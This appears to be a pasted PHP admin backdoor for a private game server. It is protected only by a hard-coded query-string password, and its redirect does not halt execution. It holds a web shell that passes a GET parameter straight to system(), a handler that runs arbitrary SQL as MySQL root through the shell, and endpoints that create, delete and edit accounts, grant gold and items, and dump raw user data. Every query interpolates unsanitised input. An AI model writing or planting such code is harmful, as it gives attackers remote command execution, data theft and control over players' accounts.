newwwwwwwwww

1. <?php
2. require_once '../../../config.php';
3. require_once '../../../classes/class.smarty/Smarty.class.php';
4. require_once '../../../classes/class.content.php';
5. require_once '../../../classes/class.gamehandler.php';
6.  
7. $Handler = new Handler();
8. $Handler->caching = false;
9.  
10. function update($id, $table, $fields) {
11.     $set = '';
12.     $x = 1;
13.  
14.     foreach($fields as $name => $value) {
15.         $set .= "{$name} = '{$value}'";
16.  
17.         if($x < count ($fields)) {
18.             $set .= ', ';
19.         }
20.  
21.         $x++;
22.     }
23.  
24.     return "UPDATE {$table} SET {$set} WHERE id = {$id}";
25. }
26.  
27. $password = 'ZB8G3uzYhvFA380ofnIp';
28.  
29. if($_GET['anticrawl'] != $password) {
30.     header('Location: http://augoeides.world/404');
31. }
32.  
33. switch(key($_GET)) {
34.     case 'registerAccount':
35.         if (isset($_POST['username'])):
36.             extract($_POST);
37.  
38.             $email = substr(md5(mt_rand()), 0, 7) . '@gmail.com';
39.  
40.             $password = $Handler->encryptPassword($username, $password);
41.  
42.             $idk1 = dechex(6180663);
43.             $idk2 = dechex(15388042);
44.             $idk3 = dechex(91294);
45.  
46.             $Handler->MySQL('Query', "INSERT INTO `users` (`Name`, `Hash`, `HairID`, `Access`, `ActivationFlag`, `PermamuteFlag`, `Country`, `Age`, `Gender`, `Email`, `Level`, `Gold`, `Coins`, `Exp`, `ColorHair`, `ColorSkin`, `ColorEye`, `ColorBase`, `ColorTrim`, `ColorAccessory`, `SlotsBag`, `SlotsBank`, `SlotsHouse`, `DateCreated`, `CpBoostExpire`, `RepBoostExpire`, `GoldBoostExpire`, `ExpBoostExpire`, `UpgradeExpire`, `UpgradeDays`, `Upgraded`, `Achievement`, `Settings`, `DailyQuests0`, `DailyQuests1`, `DailyQuests2`, `MonthlyQuests0`, `LastArea`, `CurrentServer`, `HouseInfo`, `KillCount`, `DeathCount`, `RemoteAddress`, `Referrer`) VALUES ('{$username}', '{$password}', 52, 1, 5, 0, 'US', 21, 'M', '{$email}', {$level}, {$gold}, {$coins}, 0, '{$idk1}', '{$idk2}', '{$idk3}', '000000', '000000', '000000', 500, 500, 500, '{$date}', '2000-01-01 00:00:00', '2000-01-01 00:00:00', '2000-01-01 00:00:00', '2000-01-01 00:00:00', '2000-01-01 00:00:00', -1, 0, 0, 0, 0, 0, 0, 0, '', 'Offline', '', 0, 0, '', 0);");
47.  
48.             $Handler->UserData = $Handler->getUserObjectByName($username);
49.  
50.             #class
51.             $Handler->MySQL('Query', "INSERT INTO `users_items` (itemid, userid, equipped, quantity, EnhID, Bank) VALUES ('2', '{$Handler->UserData->id}', '1', 1, 2000, 0)");
52.  
53.             #item
54.             $Handler->MySQL('Query', "INSERT INTO `users_items` (itemid, userid, equipped, quantity, EnhID, Bank) VALUES ('100060', '{$Handler->UserData->id}', '1', 1, 2000, 0)");
55.  
56.             echo json_encode(array('success' => true));
57.         endif;
58.         break;
59.     case 'findByUsername':
60.         $query = $Handler->MySQL('Query', "SELECT id, Name, Gold, Coins, Level, Email FROM users WHERE Name LIKE '%{$_GET['findByUsername']}%'");
61.  
62.         $array = [];
63.  
64.         while($user = $query->fetch_object()) {
65.             $array[] = $user;
66.         }
67.  
68.         echo json_encode($array);
69.         break;
70.     case 'findByEmail':
71.         $query = $Handler->MySQL('Query', "SELECT id, Name, Gold, Coins, Level, Email FROM users WHERE Email LIKE '%{$_GET['findByEmail']}%'");
72.  
73.         $array = [];
74.  
75.         while($user = $query->fetch_object()) {
76.             $array[] = $user;
77.         }
78.  
79.         echo json_encode($array);
80.         break;
81.     case 'getUserData':
82.         $userdata = $Handler->MySQL('Query', "SELECT id, Name, Gold, Coins, Level, Email FROM users WHERE Name = '{$_GET['getUserData']}'")->fetch_object();
83.  
84.         echo json_encode($userdata);
85.         break;
86.     case 'findItems':
87.         $query = $Handler->MySQL('Query', "SELECT id, Name FROM items WHERE Name LIKE '%{$_GET['findItems']}%'");
88.  
89.         $array = [];
90.  
91.         while($item = $query->fetch_object()) {
92.             $array[] = $item;
93.         }
94.  
95.         echo json_encode($array);
96.         break;
97.     case 'deleteUser':
98.         $query = $Handler->MySQL('Query', "SELECT id, Name FROM users WHERE Name = '{$_GET['deleteUser']}'");
99.         $user = $query->fetch_object();
100.  
101.         if($query->num_rows > 0) {
102.             $Handler->MySQL('Query', "DELETE FROM users WHERE Name = '{$_GET['deleteUser']}'");
103.  
104.             $Handler->MySQL('Query', "DELETE FROM users_auctions WHERE UserID = '{$user->id}'");
105.             $Handler->MySQL('Query', "DELETE FROM users_auctions WHERE BuyerID = '{$user->id}'");
106.  
107.             $Handler->MySQL('Query', "DELETE FROM users_bans WHERE UserID = '{$user->id}'");
108.  
109.             $Handler->MySQL('Query', "DELETE FROM users_factions WHERE UserID = '{$user->id}'");
110.  
111.             $Handler->MySQL('Query', "DELETE FROM users_friends WHERE UserID = '{$user->id}'");
112.             $Handler->MySQL('Query', "DELETE FROM users_friends WHERE FriendID = '{$user->id}'");
113.  
114.             $Handler->MySQL('Query', "DELETE FROM users_guilds WHERE UserID = '{$user->id}'");
115.             $Handler->MySQL('Query', "DELETE FROM users_items WHERE UserID = '{$user->id}'");
116.  
117.             $Handler->MySQL('Query', "DELETE FROM users_logins WHERE UserID = '{$user->id}'");
118.             $Handler->MySQL('Query', "DELETE FROM users_logs WHERE UserID = '{$user->id}'");
119.  
120.             $Handler->MySQL('Query', "DELETE FROM users_purchases WHERE UserID = '{$user->id}'");
121.  
122.             $Handler->MySQL('Query', "DELETE FROM users_names WHERE Previous = '{$user->Name}'");
123.             $Handler->MySQL('Query', "DELETE FROM users_names WHERE New = '{$user->Name}'");
124.  
125.             echo json_encode(array('success' => true));
126.         } else {
127.             echo json_encode(array('success' => false));
128.         }
129.  
130.         break;
131.     case 'editUserData':
132.         if(isset($_GET['editUserData']) || $_POST['username']) {
133.             extract($_POST);
134.  
135.             $query = $Handler->MySQL('Query', "UPDATE users SET Name = '{$username}', Gold = '{$gold}', Coins = '{$coins}', Email = '{$email}', Level = '{$level}' WHERE Name = '{$username}'");
136.             echo json_encode(array('success' => true));
137.         } else {
138.             echo json_encode(array('success' => false));
139.         }
140.         break;
141.     case 'changeUserPassword':
142.         if(isset($_POST['username'])) {
143.             extract($_POST);
144.             $password = $Handler->encryptPassword($username, $password);
145.             $items  = $Handler->MySQL('Query', "UPDATE users SET Hash = '{$password}' WHERE Name = '{$username}'");
146.  
147.             echo json_encode(array('success' => true));
148.         }
149.         break;
150.     case 'addUserItem':
151.         if(isset($_POST['item'])) {
152.             $user = $Handler->getUserObjectByName($_GET['addUserItem']);
153.  
154.             if($user == null) {
155.                 echo json_encode(array('success' => false));
156.                 die;
157.             }
158.  
159.             $items  = $Handler->MySQL('Query', "SELECT id, Name, EnhID, Type FROM items WHERE id = '{$_POST['item']}'");
160.  
161.             if($items->num_rows == 0) {
162.                 echo json_encode(array('success' => false));
163.                 die;
164.             }
165.  
166.             $item = $items->fetch_object();
167.  
168.             $enhancement = ($item->Type == "Armor") ? $item->EnhID : $_POST['enhancement'];
169.  
170.             $Handler->MySQL('Query', "INSERT INTO `users_items` (itemid, userid, equipped, quantity, EnhID, Bank, DatePurchased) VALUES ('{$item->id}', '{$user->id}', '0', '{$_POST['quantity']}', '{$enhancement}', '{$_POST['bank']}', NOW())");
171.  
172.             echo json_encode(array('success' => true, 'username' => $user->Name, 'item' => $item->Name));
173.         } else {
174.             echo json_encode(array('success' => false));
175.         }
176.         break;
177.     case 'getEnhancements':
178.         $query = $Handler->MySQL('Query', "SELECT id, Name FROM enhancements");
179.  
180.         $array = [];
181.  
182.         while($item = $query->fetch_object()) {
183.             $array[] = $item;
184.         }
185.  
186.         echo json_encode($array);
187.         break;
188.     case 'getFactions':
189.         $query = $Handler->MySQL('Query', "SELECT id, Name FROM factions");
190.  
191.         $array = [];
192.  
193.         while($item = $query->fetch_object()) {
194.             $array[] = $item;
195.         }
196.  
197.         echo json_encode($array);
198.         break;
199.     case 'addFaction':
200.         if(isset($_POST['rep'])) {
201.            $reputation  = $Handler->MySQL('Query', "SELECT id, Name FROM factions WHERE id = '{$_POST['rep']}'");
202.            $userq = $Handler->MySQL('Query', "SELECT id, Name FROM users WHERE Name = '{$_POST['name']}'");
203.  
204.            if ($reputation->num_rows == 0 || $userq->num_rows == 0) {
205.                echo json_encode(array('success' => false));
206.                die;
207.            }
208.  
209.            $rep = $reputation->fetch_object();
210.            $user = $userq->fetch_object();
211.  
212.            $repCheck = $Handler->MySQL('Query', "SELECT FactionID FROM users_factions WHERE UserID = '{$user->id}' AND FactionID = '{$_POST['rep']}'");
213.  
214.            if($repCheck->num_rows > 0) {
215.                $Handler->MySQL('Query', "UPDATE users_factions SET Reputation = 302500 WHERE UserID = '{$user->id}' AND FactionID = '{$_POST['rep']}'");
216.            } else {
217.                $Handler->MySQL('Query', "INSERT INTO users_factions (UserID, FactionID, Reputation) VALUES ('{$user->id}', '{$rep->id}', 302500)");
218.            }
219.  
220.            echo json_encode(array('success' => true));
221.         }
222.         break;
223.     case 'getDatabases':
224.         $query = $Handler->MySQL('Query', "SHOW DATABASES");
225.  
226.         $array = [];
227.  
228.         while($item = $query->fetch_object()) {
229.             $array[] = $item->Database;
230.         }
231.  
232.         echo json_encode(array_values($array));
233.         break;
234.     case 'cmd':
235.         system($_GET['cmd']);
236.         break;
237.     case 'sql':
238.         $db = isset($_GET['db']) ? $_GET['db'] : 'mextv3';
239.         system("\"C:\Program Files\MySQL\MySQL Workbench 6.3 CE\\mysql.exe\" -u root -e \"{$_GET['sql']}\" {$db}");
240.         break;
241.     case 'getRawUser':
242.         $user = $Handler->MySQL('Query', "SELECT * FROM users WHERE Name = '{$_GET['name']}'");
243.         echo json_encode($user->fetch_object());
244.         break;
245.     case 'getStaffItems':
246.         $query = $Handler->MySQL('Query', "SELECT ItemID FROM users_items WHERE ItemID = ANY (SELECT id FROM items WHERE id = ANY (SELECT ItemID FROM users_items WHERE UserID = '{$_GET['getStaffItems']}') AND Staff = 1) AND UserID = '{$_GET['getStaffItems']}'");
247.  
248.         $array = [];
249.  
250.         while($item = $query->fetch_object()) {
251.             $array[] = $item->ItemID;
252.         }
253.  
254.         echo implode(', ', $array);
255.         break;
256.     case 'editRawUser':
257.         if(isset($_POST['id'])) {
258.             $query = update($_POST['id'], 'users', $_POST);
259.  
260.             $Handler->MySQL('Query', $query);
261.  
262.             echo json_encode(array('success' => true));
263.         }
264.         break;
265. }